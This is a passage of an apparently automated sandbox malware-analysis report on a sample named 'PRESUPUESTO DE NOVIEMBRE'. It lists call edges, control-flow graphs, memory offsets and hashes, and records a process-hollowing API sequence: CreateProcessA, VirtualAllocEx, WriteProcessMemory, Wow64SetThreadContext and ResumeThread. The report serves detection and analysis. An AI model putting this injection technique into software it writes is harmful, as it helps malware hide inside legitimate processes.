ResumeThread 24891->24893 24894 781ce98 ResumeThread 24891->24894 24892->24770 24893->24891 24894->24891 24896 781d560 WriteProcessMemory 24895->24896 24898 781d5b7 24896->24898 24898->24819 24900 781d560 WriteProcessMemory 24899->24900 24902 781d5b7 24900->24902 24902->24819 24904 781d829 CreateProcessA 24903->24904 24906 781d9eb 24904->24906 24908 781d7a1 CreateProcessA 24907->24908 24910 781d9eb 24908->24910 24912 781ce98 ResumeThread 24911->24912 24914 781cf09 24912->24914 24914->24834 24916 781ced8 ResumeThread 24915->24916 24918 781cf09 24916->24918 24918->24834 24920 781d3c5 Wow64SetThreadContext 24919->24920 24922 781d40d 24920->24922 24922->24833 24924 781d3c5 Wow64SetThreadContext 24923->24924 24926 781d40d 24924->24926 24926->24833 24928 781d498 VirtualAllocEx 24927->24928 24930 781d4d5 24928->24930 24930->24841 24932 781d498 VirtualAllocEx 24931->24932 24934 781d4d5 24932->24934 24934->24841 24936 781d653 ReadProcessMemory 24935->24936 24938 781d697 24936->24938 24938->24852 24940 781d653 ReadProcessMemory 24939->24940 24942 781d697 24940->24942 24942->24852 24943 1504668 24944 150467a 24943->24944 24945 1504686 24944->24945 24949 1504778 24944->24949 24954 1504204 24945->24954 24947 15046a5 24950 150479d 24949->24950 24958 1504878 24950->24958 24962 1504888 24950->24962 24955 150420f 24954->24955 24970 15059fc 24955->24970 24957 1507084 24957->24947 24959 1504888 24958->24959 24960 150498c 24959->24960 24966 1504560 24959->24966 24963 15048af 24962->24963 24964 1504560 CreateActCtxA 24963->24964 24965 150498c 24963->24965 24964->24965 24967 1505d18 CreateActCtxA 24966->24967 24969 1505ddb 24967->24969 24971 1505a07 24970->24971 24974 1505a1c 24971->24974 24973 1507425 24973->24957 24975 1505a27 24974->24975 24978 1505a4c 24975->24978 24977 1507502 24977->24973 24979 1505a57 24978->24979 24982 1505a7c 24979->24982 24981 1507605 24981->24977 24983 1505a87 24982->24983 24985 1508b6b 24983->24985 24989 150ae10 24983->24989 24984 1508ba9 24984->24981 24985->24984 24992 150cf10 24985->24992 24997 150cf00 24985->24997 25002 150b250 24989->25002 24993 150cf31 24992->24993 24994 150cf55 24993->24994 25010 150d4c8 24993->25010 25014 150d4b9 24993->25014 24994->24984 24998 150cf31 24997->24998 24999 150cf55 24998->24999 25000 150d4c8 GetModuleHandleW 24998->25000 25001 150d4b9 GetModuleHandleW 24998->25001 24999->24984 25000->24999 25001->24999 25005 150b33a 25002->25005 25003 150ae26 25003->24985 25006 150b37c 25005->25006 25007 150b359 25005->25007 25006->25003 25007->25006 25008 150b580 GetModuleHandleW 25007->25008 25009 150b5ad 25008->25009 25009->25003 25011 150d4d5 25010->25011 25012 150d50f 25011->25012 25018 150d2f0 25011->25018 25012->24994 25016 150d4c8 25014->25016 25015 150d50f 25015->24994 25016->25015 25017 150d2f0 GetModuleHandleW 25016->25017 25017->25015 25019 150d2fb 25018->25019 25021 150de20 25019->25021 25022 150d40c 25019->25022 25021->25021 25023 150d417 25022->25023 25024 1505a7c GetModuleHandleW 25023->25024 25025 150de8f 25024->25025 25025->25021
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a03d2625317b26f073d8b7e70b76f9fed0d726f6a456e1c2a204c8d682c8791c
                                                                                              • Instruction ID: d6c2f29ee953b132d141e5375fd1c20f5ab403fd1d607295d364c4f423293ae9
                                                                                              • Opcode Fuzzy Hash: a03d2625317b26f073d8b7e70b76f9fed0d726f6a456e1c2a204c8d682c8791c
                                                                                              • Instruction Fuzzy Hash: 174281B4E01219CFDB64CFA9C984B9DBBF6BF48310F1481A9E809A7355D734AA81CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e481d9a62291c6e944b2e25f98c57f4e2069a8ffd63a40689364101b294d4a98
                                                                                              • Instruction ID: e93647745d0c9fe14119c03a29c1ee990c55d8331ee907cc078a48e24a376c84
                                                                                              • Opcode Fuzzy Hash: e481d9a62291c6e944b2e25f98c57f4e2069a8ffd63a40689364101b294d4a98
                                                                                              • Instruction Fuzzy Hash: 2DA1A274E0020DDFDB05DFA9D994AADBBB2FF88300F148529E509AB368DB356945CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a2c365fd4035e593d2e6273f41b2b40163247c474e7afb19e8d92e5972bf02b
                                                                                              • Instruction ID: 977bc56ac1780305d4a237806051f8343780974a0efb9e556050b352fac2fd68
                                                                                              • Opcode Fuzzy Hash: 9a2c365fd4035e593d2e6273f41b2b40163247c474e7afb19e8d92e5972bf02b
                                                                                              • Instruction Fuzzy Hash: 08A1B174E00309EFDB05DFA9D994AADBBB2FF88300F148569E509AB368DB356945CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 434358b5a1f1f96076cc3bb024dbef94f43c55c8e924203c0143dcdcbcaf20ef
                                                                                              • Instruction ID: 92fd0b334f18a7edfa2b156038140b5f500324d07819679572d6190c454c07a4
                                                                                              • Opcode Fuzzy Hash: 434358b5a1f1f96076cc3bb024dbef94f43c55c8e924203c0143dcdcbcaf20ef
                                                                                              • Instruction Fuzzy Hash: 2461C4B4E01218CFDB58CFAAD995B9DBBF2BF88310F1481A9D809A7394D7359981CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 563f9b6d6a86c93ebef6866cb570c38bbd3cba58aae9fd83e492b37f7e97d363
                                                                                              • Instruction ID: 69ccced0f517d79184ad30ad20e61656503ed93ace4ff4ec9f6650cc9a7d9919
                                                                                              • Opcode Fuzzy Hash: 563f9b6d6a86c93ebef6866cb570c38bbd3cba58aae9fd83e492b37f7e97d363
                                                                                              • Instruction Fuzzy Hash: B621E4B1D056189BEB18CFABDD053DEBFB6AFC9310F04C16AD408A6264DB7409458FA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e5731ddb3a5bae492fa43aa41eb64dd5a2a5d72dbf5f0a1b54614df8dd84494
                                                                                              • Instruction ID: 842a3d110bbcfd611921452177545f75c9a4862a7eed25e675f4f46a12cd62ac
                                                                                              • Opcode Fuzzy Hash: 5e5731ddb3a5bae492fa43aa41eb64dd5a2a5d72dbf5f0a1b54614df8dd84494
                                                                                              • Instruction Fuzzy Hash: DC11D7B481925CCFCB60CF64D448BF8BBB8BB2A316F4450E6D90EE2291C7348A85CF10

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 407 781d795-781d835 410 781d837-781d841 407->410 411 781d86e-781d88e 407->411 410->411 412 781d843-781d845 410->412 416 781d890-781d89a 411->416 417 781d8c7-781d8f6 411->417 413 781d847-781d851 412->413 414 781d868-781d86b 412->414 418 781d853 413->418 419 781d855-781d864 413->419 414->411 416->417 420 781d89c-781d89e 416->420 427 781d8f8-781d902 417->427 428 781d92f-781d9e9 CreateProcessA 417->428 418->419 419->419 421 781d866 419->421 422 781d8c1-781d8c4 420->422 423 781d8a0-781d8aa 420->423 421->414 422->417 425 781d8ac 423->425 426 781d8ae-781d8bd 423->426 425->426 426->426 429 781d8bf 426->429 427->428 430 781d904-781d906 427->430 439 781d9f2-781da78 428->439 440 781d9eb-781d9f1 428->440 429->422 432 781d929-781d92c 430->432 433 781d908-781d912 430->433 432->428 434 781d914 433->434 435 781d916-781d925 433->435 434->435 435->435 437 781d927 435->437 437->432 450 781da88-781da8c 439->450 451 781da7a-781da7e 439->451 440->439 453 781da9c-781daa0 450->453 454 781da8e-781da92 450->454 451->450 452 781da80 451->452 452->450 456 781dab0-781dab4 453->456 457 781daa2-781daa6 453->457 454->453 455 781da94 454->455 455->453 459 781dac6-781dacd 456->459 460 781dab6-781dabc 456->460 457->456 458 781daa8 457->458 458->456 461 781dae4 459->461 462 781dacf-781dade 459->462 460->459 464 781dae5 461->464 462->461 464->464
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0781D9D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: eed755ae726406a72baa8ed8b1e1e2d5a0e0c85b30a5d3e0459e264affc3e108
                                                                                              • Instruction ID: 3bf6915bc226ad2d15b69245ae28bcc06015b61e59cc144642cf65d83165e6ef
                                                                                              • Opcode Fuzzy Hash: eed755ae726406a72baa8ed8b1e1e2d5a0e0c85b30a5d3e0459e264affc3e108
                                                                                              • Instruction Fuzzy Hash: 9F917DB1E0061ACFDB10DFA9C841BDDBBB6BF48314F1485A9D848E7290DB749985CFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 465 781d7a0-781d835 467 781d837-781d841 465->467 468 781d86e-781d88e 465->468 467->468 469 781d843-781d845 467->469 473 781d890-781d89a 468->473 474 781d8c7-781d8f6 468->474 470 781d847-781d851 469->470 471 781d868-781d86b 469->471 475 781d853 470->475 476 781d855-781d864 470->476 471->468 473->474 477 781d89c-781d89e 473->477 484 781d8f8-781d902 474->484 485 781d92f-781d9e9 CreateProcessA 474->485 475->476 476->476 478 781d866 476->478 479 781d8c1-781d8c4 477->479 480 781d8a0-781d8aa 477->480 478->471 479->474 482 781d8ac 480->482 483 781d8ae-781d8bd 480->483 482->483 483->483 486 781d8bf 483->486 484->485 487 781d904-781d906 484->487 496 781d9f2-781da78 485->496 497 781d9eb-781d9f1 485->497 486->479 489 781d929-781d92c 487->489 490 781d908-781d912 487->490 489->485 491 781d914 490->491 492 781d916-781d925 490->492 491->492 492->492 494 781d927 492->494 494->489 507 781da88-781da8c 496->507 508 781da7a-781da7e 496->508 497->496 510 781da9c-781daa0 507->510 511 781da8e-781da92 507->511 508->507 509 781da80 508->509 509->507 513 781dab0-781dab4 510->513 514 781daa2-781daa6 510->514 511->510 512 781da94 511->512 512->510 516 781dac6-781dacd 513->516 517 781dab6-781dabc 513->517 514->513 515 781daa8 514->515 515->513 518 781dae4 516->518 519 781dacf-781dade 516->519 517->516 521 781dae5 518->521 519->518 521->521
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0781D9D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 8fcc14fae00c39487dd9a5da302e27bbf2371d64dafab6b2e55631cd6a6b8a74
                                                                                              • Instruction ID: 2723d1c1d24c185072357ae6f25f91ffe5a0a2449c428219b56f0361c86fb5df
                                                                                              • Opcode Fuzzy Hash: 8fcc14fae00c39487dd9a5da302e27bbf2371d64dafab6b2e55631cd6a6b8a74
                                                                                              • Instruction Fuzzy Hash: 0A916DB1E0061ACFDB10DF69C841BEDBBB6BF48314F1485A9D849E7280DB749985CFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 522 150b33a-150b357 523 150b383-150b387 522->523 524 150b359-150b366 call 1509db8 522->524 525 150b389-150b393 523->525 526 150b39b-150b3dc 523->526 531 150b368 524->531 532 150b37c 524->532 525->526 533 150b3e9-150b3f7 526->533 534 150b3de-150b3e6 526->534 577 150b36e call 150b5d0 531->577 578 150b36e call 150b5e0 531->578 532->523 535 150b3f9-150b3fe 533->535 536 150b41b-150b41d 533->536 534->533 539 150b400-150b407 call 150b000 535->539 540 150b409 535->540 538 150b420-150b427 536->538 537 150b374-150b376 537->532 541 150b4b8-150b578 537->541 542 150b434-150b43b 538->542 543 150b429-150b431 538->543 545 150b40b-150b419 539->545 540->545 572 150b580-150b5ab GetModuleHandleW 541->572 573 150b57a-150b57d 541->573 546 150b448-150b451 call 150b010 542->546 547 150b43d-150b445 542->547 543->542 545->538 553 150b453-150b45b 546->553 554 150b45e-150b463 546->554 547->546 553->554 555 150b481-150b48e 554->555 556 150b465-150b46c 554->556 562 150b490-150b4ae 555->562 563 150b4b1-150b4b7 555->563 556->555 558 150b46e-150b47e call 150b020 call 150b030 556->558 558->555 562->563 574 150b5b4-150b5c8 572->574 575 150b5ad-150b5b3 572->575 573->572 575->574 577->537 578->537
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B59E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: c5404879f579b750f672ef4d6cc9bb28ccc4a1accaec0c55b2261518b862adab
                                                                                              • Instruction ID: 031d150d8461442c04e6feb46bfe850e745c4e40fd7efd72769a3946cede4de4
                                                                                              • Opcode Fuzzy Hash: c5404879f579b750f672ef4d6cc9bb28ccc4a1accaec0c55b2261518b862adab
                                                                                              • Instruction Fuzzy Hash: 05813674A00B058FD725DF69D49479ABBF2FF88300F148A2DD446DBA90E735E949CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 688 1504560-1505dd9 CreateActCtxA 691 1505de2-1505e3c 688->691 692 1505ddb-1505de1 688->692 699 1505e4b-1505e4f 691->699 700 1505e3e-1505e41 691->700 692->691 701 1505e60 699->701 702 1505e51-1505e5d 699->702 700->699 703 1505e61 701->703 702->701 703->703
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01505DC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 6fdcc10ed6ee3513ea52b4c17493baddc1479ae0647557718a8f01f4ca449510
                                                                                              • Instruction ID: 313dee21a7bcc1370ff51de61e31deaa7e4429bca857396f17f0d59cdb391dbd
                                                                                              • Opcode Fuzzy Hash: 6fdcc10ed6ee3513ea52b4c17493baddc1479ae0647557718a8f01f4ca449510
                                                                                              • Instruction Fuzzy Hash: 4541E1B0C0061DCBDB25DFA9C844BCDBBB5BF49304F60846AD408AB255DB715945CF90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 705 1505d0c-1505dd9 CreateActCtxA 707 1505de2-1505e3c 705->707 708 1505ddb-1505de1 705->708 715 1505e4b-1505e4f 707->715 716 1505e3e-1505e41 707->716 708->707 717 1505e60 715->717 718 1505e51-1505e5d 715->718 716->715 719 1505e61 717->719 718->717 719->719
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01505DC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 5868a86f326e1392d52168fcbf9c1361bdee73272f0170ef3cccb8902ff04722
                                                                                              • Instruction ID: 44dba7be1e2fd7eff947f164caf79000759faa10926763873667593c387651f9
                                                                                              • Opcode Fuzzy Hash: 5868a86f326e1392d52168fcbf9c1361bdee73272f0170ef3cccb8902ff04722
                                                                                              • Instruction Fuzzy Hash: A141E0B1C00619CEDB25DFA9C844BDEBBF5BF49304F60806AD408AB264DB715945CF90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 721 781d511-781d566 723 781d576-781d5b5 WriteProcessMemory 721->723 724 781d568-781d574 721->724 726 781d5b7-781d5bd 723->726 727 781d5be-781d5ee 723->727 724->723 726->727
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0781D5A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 3b1297fe1c8197148a11c15421e3385b1b1e0ca9b02ee039560cb3e8729d8329
                                                                                              • Instruction ID: 04de4d469f151cdea0e59b8567ec998f15b5de4ae646a040887ecf295d018658
                                                                                              • Opcode Fuzzy Hash: 3b1297fe1c8197148a11c15421e3385b1b1e0ca9b02ee039560cb3e8729d8329
                                                                                              • Instruction Fuzzy Hash: F42144B19003599FDB10DFA9C885BDEBBF5FF48310F10842AE918A7240D7799944CBA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 731 781d518-781d566 733 781d576-781d5b5 WriteProcessMemory 731->733 734 781d568-781d574 731->734 736 781d5b7-781d5bd 733->736 737 781d5be-781d5ee 733->737 734->733 736->737
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0781D5A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 8841b5eabb535a1fe7ed1ebc86e0cbca4590105d23dde60020be4d52ec2db158
                                                                                              • Instruction ID: abee9685d2e5c88561a1c41931170a2b19732ec353a3dd3dd231bd190d5b3d07
                                                                                              • Opcode Fuzzy Hash: 8841b5eabb535a1fe7ed1ebc86e0cbca4590105d23dde60020be4d52ec2db158
                                                                                              • Instruction Fuzzy Hash: E62136B1D003599FCB10DFA9C985BDEBBF5FF48314F10842AE919A7250D7799944CBA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 747 781d378-781d3cb 749 781d3db-781d40b Wow64SetThreadContext 747->749 750 781d3cd-781d3d9 747->750 752 781d414-781d444 749->752 753 781d40d-781d413 749->753 750->749 753->752
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0781D3FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 9575bd25c6b00d82887faede186d70d48dd10353de753af59770651ea7849ac7
                                                                                              • Instruction ID: f66b0cb9afd9a8288f559977d8f531ffb3e78eb3bf77158d70f32aeac75c157b
                                                                                              • Opcode Fuzzy Hash: 9575bd25c6b00d82887faede186d70d48dd10353de753af59770651ea7849ac7
                                                                                              • Instruction Fuzzy Hash: FA2168B1D003099FDB10DFAAC8857EEBBF8AF48324F10842AD419A7241D778A945CFA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 741 150b234-150d8bc DuplicateHandle 743 150d8c5-150d8e2 741->743 744 150d8be-150d8c4 741->744 744->743
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D7EE,?,?,?,?,?), ref: 0150D8AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 94200c601c506a908b0c88db49eec22473061a63bcfcd8878927bf4281576098
                                                                                              • Instruction ID: df017e85c392ebd833b9914ae93918979f36fcf6f91ff8d0d57a340788b12783
                                                                                              • Opcode Fuzzy Hash: 94200c601c506a908b0c88db49eec22473061a63bcfcd8878927bf4281576098
                                                                                              • Instruction Fuzzy Hash: 0F21B5B5D00248DFDB10CF99D584ADEBBF5FB48310F14845AE918A7350D374A954CFA5
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0781D688
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: c042db7cabf731525c81697e43b6569022e06342981d4bdf0dc37b416e8f2840
                                                                                              • Instruction ID: 2849b22fce93647738a8104f953023042c6ee07cc987b71389933cf60cb33371
                                                                                              • Opcode Fuzzy Hash: c042db7cabf731525c81697e43b6569022e06342981d4bdf0dc37b416e8f2840
                                                                                              • Instruction Fuzzy Hash: 082136B1D007499FDB10DFA9C880ADEBBF5FF48310F10842AE918A7240D7799904CFA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 757 150d820-150d822 758 150d828-150d8bc DuplicateHandle 757->758 759 150d8c5-150d8e2 758->759 760 150d8be-150d8c4 758->760 760->759
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D7EE,?,?,?,?,?), ref: 0150D8AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 85593d238c7a8311ee2245b1901cbdea15ed96806ff765d0ef596c7bf343ddd3
                                                                                              • Instruction ID: e3df33985e881e7aaef0c1081f1887c1f39619ac5a1b4e72f987928833dcd52b
                                                                                              • Opcode Fuzzy Hash: 85593d238c7a8311ee2245b1901cbdea15ed96806ff765d0ef596c7bf343ddd3
                                                                                              • Instruction Fuzzy Hash: 7421D2B5900248AFDB10CFAAD985ADEBFF8FF48310F14841AE918A7350D374A944CFA0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0781D688
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 65e5497a96426e6902659d87c0be041aca4e13f40863f0a4a8932418514327a2
                                                                                              • Instruction ID: 1febb4381e3abc7d254e963a6de9943acc7ea55ff7c5411e8540d19d4a0ccbed
                                                                                              • Opcode Fuzzy Hash: 65e5497a96426e6902659d87c0be041aca4e13f40863f0a4a8932418514327a2
                                                                                              • Instruction Fuzzy Hash: 3A2125B1D003599FCB10DFAAC885AEEFBF5FF48310F50842AE919A7250D7799945CBA0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0781D3FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 7af6cdfcc7b84ce3ffe07d2b856510ce09d84b59ab342da5ae629e25d2f048c8
                                                                                              • Instruction ID: 6be19809e99040ae1676a71553e94bec4b05a84da98120c62b856a48ef6e3c63
                                                                                              • Opcode Fuzzy Hash: 7af6cdfcc7b84ce3ffe07d2b856510ce09d84b59ab342da5ae629e25d2f048c8
                                                                                              • Instruction Fuzzy Hash: 162147B1D003098FDB10DFAAC4857EEBBF8EF48324F10842AD419A7240DB78A945CFA0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0781D4C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 4da43dd293f61c6d9c284a8b5a4c582c88d53f583c97696f6758ef34eab737a9
                                                                                              • Instruction ID: d8248fe872d08f934b8e29745050e97fee0f8ab50e7bbab218e636a41491e66a
                                                                                              • Opcode Fuzzy Hash: 4da43dd293f61c6d9c284a8b5a4c582c88d53f583c97696f6758ef34eab737a9
                                                                                              • Instruction Fuzzy Hash: 2F1156B1D002499FDB10DFAAC844BDFBFF5AF48320F20881AE519A7250C779A944CFA0
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0781D4C6
                                                                                              Memory Dump Source
